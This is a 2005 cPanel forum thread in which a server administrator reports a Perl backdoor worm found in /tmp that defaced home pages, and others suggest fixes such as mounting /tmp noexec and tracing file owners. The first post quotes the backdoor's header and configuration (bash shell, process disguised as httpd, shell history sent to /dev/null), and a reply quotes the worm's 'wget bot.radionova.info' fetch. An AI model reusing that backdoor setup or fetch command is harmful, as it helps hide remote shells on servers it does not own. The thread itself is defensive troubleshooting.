The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

I got an perl worm exploit in temp it defaced only my home pages

Discussion in 'General Discussion' started by jean louis, Jan 23, 2005.

  1. jean louis

    jean louis Member

    Joined:
    Dec 18, 2003
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    1
    I got an perl worm exploit in tmp it defaced only my home pages

    the perl worm is called bd.txt
    i got already al ready anti santy worm asw.txt and now this one

    I have to find the way to stop perl executing script in my temp folder
    help ????

    the bd in question:
    #!/usr/bin/perl
    # Telnet-like Standard Daemon 0.7
    #
    # 0ldW0lf - oldwolf@atrixteam.net
    # - old-wolf@zipmai.com
    # - www.atrix.cjb.net
    # - www.atrixteam.net
    #
    # For those guys that still like to open ports
    # and use non-rooted boxes
    #
    # This has been developed to join in the TocToc
    # project code, now it's done and I'm distributing
    # this separated
    #
    # This one i made without IO::Pty so it uses
    # only standard modules... enjoy it
    #
    # tested on linux boxes.. probably will work fine on others
    # any problem... #atrix@irc.brasnet.org
    # SENHA: 12345
    #


    ##########################################################
    # ******************* CONFIGURATION ******************** #
    ##########################################################
    my $PORT = $ARGV[0] || 8765; # default port is 3847
    my $PASS = 'SQ6qavptOhtmI'; # encripted password
    my $SHELL = "/bin/bash"; # shell to be executed
    my $HOME = "/tmp"; # your HOME
    my $PROC = "/usr/local/apache/bin/httpd"; # name of the process
    my $PASS_PROMPT = "Password: "; # password prompt
    my $WRONG_PASS = "Wrong password!"; # "wrong password" message
    my @STTY = ('sane', 'dec'); # stty arguments
    ##########################################################


    # feel free to change the ENV
    #### ENVironment ####
    $ENV{HOME} = $HOME;
    #$ENV{PS1} = '[\u@\h \W]: '; # the way i like :)
    # colorful PS1 is also funny :)
    $ENV{PS1} = '\[\033[3;36m\][\[\033[3;34m\]\[\033[1m\]\u\[\033[3;36m\]@\[\033[0m\]\[\033[3;34m\]\[\033[1m\]\h \[\033[0m\]\[\033[1m\]\W\[\033[0m\]\[\033[3;36m\]]\[\033[0m\]\[\033[1m:\[\033[0m\] ';
    $ENV{MAIL} = '/var/mail/root';
    $ENV{PATH} = '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin';
    $ENV{HISTFILE} = '/dev/null';
    $ENV{USER} = 'root';
    $ENV{LOGNAME} = 'root';
    $ENV{LS_OPTIONS} = ' --color=auto -F -b -T 0';
    $ENV{LS_COLORS}

    i did not put he complete code as too much word
     

    Attached Files:

    • bd.txt
      File size:
      11.5 KB
      Views:
      59
    #1 jean louis, Jan 23, 2005
    Last edited: Jan 23, 2005
  2. RandyO

    RandyO Well-Known Member

    Joined:
    Jun 17, 2003
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    16
    There must be 20 posts on this subject, I suggest you either do a search or get someone to work on your server that knows what they are doing............
     
  3. promak

    promak Well-Known Member

    Joined:
    Oct 6, 2001
    Messages:
    248
    Likes Received:
    0
    Trophy Points:
    16
    I got it today , just attack other .

    and i just chmod 000 to all .pl file , and change another user for the file, not the default nobody

    :cool:
     
  4. RandyO

    RandyO Well-Known Member

    Joined:
    Jun 17, 2003
    Messages:
    173
    Likes Received:
    0
    Trophy Points:
    16
    LABEL=/tmp /tmp ext3 defaults,noexec,nosuid 1 2

    guess search is broken
     
  5. promak

    promak Well-Known Member

    Joined:
    Oct 6, 2001
    Messages:
    248
    Likes Received:
    0
    Trophy Points:
    16
    /dev/md5 /tmp ext3 defaults,noexec,nosuid 1 2

    but today i check the /tmp

    have this worm and apache is 99%

    .hitler
    31337
    31338

    when i open with webmin file manager edit function, my norton show is a back door trojan.

    wget bot.radionova.info

    i have chmod wget before , can we check which log file to see which clients site is infect? and stop the worm and remove account?

    Thanks.
     
  6. bmcpanel

    bmcpanel Well-Known Member

    Joined:
    Jun 1, 2002
    Messages:
    546
    Likes Received:
    0
    Trophy Points:
    16
    Gee, that was surely helpful.

    Okay dude, it's fairly simple to find out which account it came from. cd to your /tmp directory,

    cd /tmp

    list files

    ls -l

    This will show the user owner of the file. Once you find the username of the b-a-d file, go to that user's directory and check for a forum located there. I lay odds that you will see a forum there (common hacking target and entry point). I would backup the forum and then remove it.

    This happened to me a couple of months ago (different worm/virus), but same method of entry. Only defaced the site of the user which was violated. The user had an outdated forum he got from a third party that had several known vulnerabilities. The first time, I removed his forum and let him stay. But, I moved his site to a different web server just to prove a point. On the new web server, the same thing happened. He had re-installed the forum. Found suspicious /tmp files with the same user as owner. I told the client he could not install the forum again. He decided to leave our service instead. Haven't had that problem since he left.
     
  7. rpmws

    rpmws Well-Known Member

    Joined:
    Aug 14, 2001
    Messages:
    1,824
    Likes Received:
    5
    Trophy Points:
    38
    Location:
    back woods of NC, USA

    chances are the /tmp files will be owned by nobody ..he will have to do some log hunting.
     
Loading...

Share This Page